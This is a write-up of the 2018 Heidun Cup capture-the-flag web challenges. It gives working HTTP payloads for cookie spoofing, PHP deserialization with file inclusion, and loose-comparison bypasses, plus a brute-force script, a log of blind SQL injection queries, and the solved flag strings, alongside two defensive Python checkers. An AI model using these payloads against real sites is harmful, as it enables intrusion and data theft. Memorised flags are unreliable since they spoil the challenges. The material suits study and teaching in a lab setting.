2018 Heidun Cup (黑盾杯) Web Write-up

Whatever you enter is wrong

Capturing the response in Burp Suite and reading the page source shows:

<form id="form1" name="form1" method="get" action="da.html">

Request da.html.

The flag is in its source code:

<!-- flag{250872eab74e4ae2d11ff2b5b3fcb1a5}!-->

I hear it's beautiful

Capturing the response in Burp Suite reveals this JavaScript:

<script type="text/javascript">
// disable the right-click context menu
document.oncontextmenu=function(){return false};

// the expected password is computed entirely on the client
var a,b,c,d,e,f,g;
a = 6.10;
b = a * 2;
c = a + b;
d = c / b + a;
e = c - d * b + a;
f = e + d /c -b * a;
g = f * e - d + c * b + a;
a = g * g;
a = Math.floor(a);

function check(){
    if(document.getElementById("txt").value==a){
        return true;
    }else{
        alert("密码错误");
        return false;
    }
}
</script>

The GET parameter txt must equal the value of a.

Running the script locally gives a = 98910652.

payload:

POST /web/beautiful/ HTTP/1.1
Host: 192.168.200.200
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.3.1/student/exam-second/seize-flag
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=i8h2rmbg3p18n5mt0ppar8a4d5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 12

txt=98910652

Flag obtained: flag{4b5aabaa648c42c53d39935e7ff663b9}

Information disclosure plus code audit

Requesting /.svn exposes leaked files, which yield the source code:

<?php
error_reporting(0);

$user = $_COOKIE['user'];
$code = $_GET['code']?(int)$_GET['code']:'';
if($user == 'admin' && !empty($code)) {

    $hex = (int)$code;

    if(($hex ^ 6789) === 0xCDEF) {
        require("flag.php");
        echo $flag;
        exit();
    }

}

echo "缺少应有的参数,你没有权限查看本内容";

?>

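The flag is returned when $user is admin and $code ^ 6789 equals 0xCDEF.

A short script brute-forces code (XOR is its own inverse, so the value is also simply 0xCDEF ^ 6789):

# try every candidate until the XOR check from the PHP source holds
for i in range(1000000):
    if (i ^ 6789) == 0xCDEF:
        print(i)
        break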

Result: 55146

payload:

GET /web/codeaudit/?code=55146 HTTP/1.1
Host: 192.168.200.200
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.3.1/student/exam-second/seize-flag
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=i8h2rmbg3p18n5mt0ppar8a4d5;user=admin
Connection: close

flag:flag{a737c5c5b759c3705c8100accf65b5e4}

the user is admin

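This is an original Bugku challenge: first read the source code through a PHP stream wrapper, which shows that a deserialization flaw has to be used to read the flag file.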

# index.php
<?php
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    if(preg_match("/f1a9/",$file)){
        exit();
    }else{
        include($file); //class.php
        $pass = unserialize($pass);
        echo $pass;
    }
}else{
    echo "you are not admin ! ";
}
?>

# class.php
<?php
class Read{//f1a9.php
    public $file;
    public function __toString(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
        }
        return "__toString was called!";
    }
}

Generate the serialized string locally:

<?php

class Read{//f1a9.php
    public $file;
    public function __toString(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
        }
        return "__toString was called!";
    }
}
$p = new Read();
$p->file = 'f1a9.php';
echo serialize($p);
// output: O:4:"Read":1:{s:4:"file";s:8:"f1a9.php";}
?>

Sending this POST request returns the flag:

POST /web/theuserisadmin/index.php?file=class.php&pass=O:4:"Read":1:{s:4:"file";s:8:"f1a9.php";}&user=php://input HTTP/1.1
Host: 192.168.200.200
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

the user is admin

flag{078d8dd8023d5716a11780adf344dfd2}
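
An added example, not code from the challenge or from this write-up: a small Python parser for the PHP serialize() format that lists the classes a value such as the pass parameter above would instantiate, so a request can be rejected before it reaches unserialize(). The names parse, classes_in and is_allowed are hypothetical; PHP 7's unserialize() offers the same restriction natively through its allowed_classes option.

```python
"""Inspect a PHP serialize() string before it is handed to unserialize()."""
from collections import namedtuple

PhpObject = namedtuple("PhpObject", "cls props")

# Serialized string taken from the write-up above.
PAGE_PAYLOAD = b'O:4:"Read":1:{s:4:"file";s:8:"f1a9.php";}'


def _counted(data, i):
    """Read X:<len>:"<bytes>" at offset i; return (bytes, offset after closing quote)."""
    colon = data.index(b":", i + 2)
    n = int(data[i + 2:colon])
    start = colon + 2                                 # skip :"
    if data[colon + 1:start] != b'"' or data[start + n:start + n + 1] != b'"':
        raise ValueError("length prefix does not match quoted data")
    return data[start:start + n], start + n + 1


def _members(data, colon, count):
    """Read {key value ...} holding `count` pairs; return (dict, offset after '}')."""
    if data[colon + 1:colon + 2] != b"{":
        raise ValueError("expected '{'")
    j, items = colon + 2, {}
    for _ in range(count):
        key, j = parse(data, j)
        items[key], j = parse(data, j)
    if data[j:j + 1] != b"}":
        raise ValueError("member count does not match body")
    return items, j + 1


def parse(data, i=0):
    """Parse one serialized value at offset i; return (value, next_offset)."""
    tag = data[i:i + 1]
    if data[i:i + 2] == b"N;":                        # null
        return None, i + 2
    if tag in (b"i", b"b", b"d"):                     # i:5;  b:1;  d:0.5;
        end = data.index(b";", i)
        raw = data[i + 2:end].decode()
        value = float(raw) if tag == b"d" else int(raw)
        return (bool(value) if tag == b"b" else value), end + 1
    if tag == b"s":                                   # s:<byte length>:"...";
        body, j = _counted(data, i)
        if data[j:j + 1] != b";":
            raise ValueError("unterminated string")
        return body.decode("utf-8", "replace"), j + 1
    if tag == b"a":                                   # a:<count>:{...}
        colon = data.index(b":", i + 2)
        return _members(data, colon, int(data[i + 2:colon]))
    if tag == b"O":                                   # O:<len>:"Class":<count>:{...}
        name, j = _counted(data, i)
        colon = data.index(b":", j + 1)
        props, j = _members(data, colon, int(data[j + 1:colon]))
        return PhpObject(name.decode(), props), j
    raise ValueError(f"unsupported or malformed token at offset {i}")


def classes_in(value):
    """Return every class name the parsed value would instantiate."""
    if isinstance(value, PhpObject):
        return [value.cls] + classes_in(value.props)
    if isinstance(value, dict):
        return [name for item in value.values() for name in classes_in(item)]
    return []


def is_allowed(payload, allowed=frozenset()):
    """True only if the payload parses completely and uses no class outside `allowed`."""
    try:
        value, end = parse(payload)
    except (ValueError, TypeError):
        return False                                  # malformed input is rejected
    return end == len(payload) and set(classes_in(value)) <= set(allowed)


if __name__ == "__main__":
    value, _ = parse(PAGE_PAYLOAD)
    print("classes:", classes_in(value), "allowed:", is_allowed(PAGE_PAYLOAD))
```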

The best language

A source-audit challenge that tests PHP loose (weakly typed) comparison:

<?php
show_source(__FILE__);
$a=0;
$b=0;
$c=0;
$d=0;
if (isset($_GET['x1']))
{
    $x1 = $_GET['x1'];
    $x1=="1"?die("ha?"):NULL;
    switch ($x1)
    {
        case 0:
        case 1:
            $a=1;
            break;
    }
}
$x2=(array)json_decode(@$_GET['x2']);
if(is_array($x2)){
    is_numeric(@$x2["x21"])?die("ha?"):NULL;
    if(@$x2["x21"]){
        ($x2["x21"]>2017)?$b=1:NULL;
    }
    if(is_array(@$x2["x22"])){
        if(count($x2["x22"])!==2 OR !is_array($x2["x22"][0])) die("ha?");
        $p = array_search("XIPU", $x2["x22"]);
        $p===false?die("ha?"):NULL;
        foreach($x2["x22"] as $key=>$val){
            $val==="XIPU"?die("ha?"):NULL;
        }
        $c=1;
    }
}
$x3 = $_GET['x3'];
if ($x3 != '15562') {
    if (strstr($x3, 'XIPU')) {
        if (substr(md5($x3),8,16) == substr(md5('15562'),8,16)) {
            $d=1;
        }
    }
}
if($a && $b && $c && $d){
    include "flag.php";
    echo $flag;
}
?>

First condition:

if (isset($_GET['x1']))
{
    $x1 = $_GET['x1'];
    $x1=="1"?die("ha?"):NULL;
    switch ($x1)
    {
        case 0:
        case 1:
            $a=1;
            break;
    }
}

This tests loose comparison: when switch compares a string with integer case labels, the string is first converted the way intval would convert it.

payload: x1=1a

Second condition:

$x2=(array)json_decode(@$_GET['x2']);
if(is_array($x2)){
    is_numeric(@$x2["x21"])?die("ha?"):NULL;
    if(@$x2["x21"]){
        ($x2["x21"]>2017)?$b=1:NULL;
    }
    if(is_array(@$x2["x22"])){
        if(count($x2["x22"])!==2 OR !is_array($x2["x22"][0])) die("ha?");
        $p = array_search("XIPU", $x2["x22"]);
        $p===false?die("ha?"):NULL;
        foreach($x2["x22"] as $key=>$val){
            $val==="XIPU"?die("ha?"):NULL;
        }
        $c=1;
    }
}

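json_decode decodes the JSON string, and the (array) cast turns the decoded result into an array.

The array must contain the keys x21 and x22. The value of x21 must not be a numeric string and must be greater than 2017; relying on PHP loose comparison it can be set to "x21"=>"2017a".

The value of x22 must be an array with exactly 2 elements, and its first element must itself be an array. No element of that array may be strictly equal to "XIPU", yet array_search for "XIPU" in it must succeed (must not return false). This relies on a property of array_search, which also compares loosely: the intval of "XIPU" is 0, so any element equal to 0 makes the search succeed.

So the payload is: x2={"x21":"2017a","x22":[[1],0]}

Third condition:

$x3 = $_GET['x3'];
if ($x3 != '15562') {
    if (strstr($x3, 'XIPU')) {
        if (substr(md5($x3),8,16) == substr(md5('15562'),8,16)) {
            $d=1;
        }
    }
}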

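$x3 must not loosely equal '15562', 'XIPU' must appear in $x3, and the substr(md5($x3),8,16) slice (16 characters starting at offset 8 of the MD5 hex digest) must loosely equal the same slice of the MD5 of '15562'.

I could not think of a way to bypass this, so I simply wrote a script to brute-force it: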

import requests

# local test page that echoes 'yes' when the loose comparison succeeds
base = "http://127.0.0.1/test/test34.php?x3="

for i in range(1000000000):
    url = base + str(i) + 'XIPU'
    print(url)
    r = requests.get(url)
    print(r.text + ' i: ' + str(i))
    if 'yes' in r.text:
        break

The local test page is:

<?php

$x3 = $_GET['x3'];
echo substr(md5($x3),8,16);
if(substr(md5('15562'),8,16) == substr(md5($x3),8,16) ){
    echo 'yes';
}

?>

The brute force yields x3=47484XIPU.

Final payload:

x1=1a&x2={"x21":"2017a","x22":[[1],0]}&x3=47484XIPU
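
An added example, not code from the challenge or from this write-up: a Python emulation of PHP 5/7 `==` for the types the three conditions mix, run against each gate with loose and with strict comparison to show that `===`, `array_search(..., true)` and strict string equality close all three. The gate functions and the two "0e" slices are constructed for illustration; PHP 8 no longer treats 0 == "XIPU" or 1 == "1a" as true, while two numeric strings are still compared numerically.

```python
"""Emulate PHP 5/7 `==` for the types this challenge mixes (int, string, array)."""
import hashlib
import re

# PHP numeric string: optional whitespace and sign, digits, optional fraction/exponent.
_NUM = r"[ \t\n\r\v\f]*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?"

# Constructed hex slices of the "0e<digits>" shape (not real MD5 output).
SLICE_A, SLICE_B = "0e46379442318098", "0e12345678901234"


def is_numeric(s):
    return isinstance(s, str) and re.fullmatch(_NUM, s) is not None


def to_number(s):
    """Cast a string the PHP 5/7 way: leading numeric prefix, otherwise 0."""
    m = re.match(_NUM, s)
    return float(m.group()) if m else 0.0


def loose_eq(a, b):
    """PHP 5/7 `a == b` (arrays simplified to Python list equality)."""
    if isinstance(a, list) or isinstance(b, list):
        return isinstance(a, list) and isinstance(b, list) and a == b
    if isinstance(a, str) and isinstance(b, str):
        if is_numeric(a) and is_numeric(b):
            return to_number(a) == to_number(b)    # "0e1" == "0e2": both are 0.0
        return a == b
    as_num = lambda v: to_number(v) if isinstance(v, str) else float(v)
    return as_num(a) == as_num(b)                  # number vs string: string is cast


def strict_eq(a, b):
    """PHP `a === b`: same type and same value."""
    return type(a) is type(b) and a == b


def array_search(needle, haystack, eq=loose_eq):
    """Return the first matching index, or False as PHP does."""
    for key, value in enumerate(haystack):
        if eq(value, needle):
            return key
    return False


def x1_gate(x1, eq=loose_eq):
    if eq(x1, "1"):                                # $x1=="1" ? die
        return False
    return any(eq(x1, case) for case in (0, 1))    # switch: case 0 / case 1


def x22_gate(x22, eq=loose_eq):
    if len(x22) != 2 or not isinstance(x22[0], list):
        return False
    if array_search("XIPU", x22, eq) is False:
        return False
    return all(not strict_eq(v, "XIPU") for v in x22)


def md5_slice(s):
    return hashlib.md5(s.encode()).hexdigest()[8:24]   # substr(md5($s), 8, 16)


def x3_gate(x3, eq=loose_eq):
    return (not eq(x3, "15562")) and "XIPU" in x3 and eq(md5_slice(x3), md5_slice("15562"))


if __name__ == "__main__":
    for name, eq in (("loose", loose_eq), ("strict", strict_eq)):
        print(name, "x1:", x1_gate("1a", eq), "x22:", x22_gate([[1], 0], eq),
              "0e slices equal:", eq(SLICE_A, SLICE_B),
              "x3:", x3_gate("47484XIPU", eq))
```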

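Injection log analysis

A data.log file is provided.

URL-decode the file, search for the keyword flag, and filter out the final blind-injection queries that extract the flag: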

2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>32 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>48 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>52 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>54|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>53|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>32 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>48 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>52|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>50|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>49 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>64 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>96 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>112|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>104|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>100|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>98 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>99|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>32 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>48 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>52 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>54|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>53 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
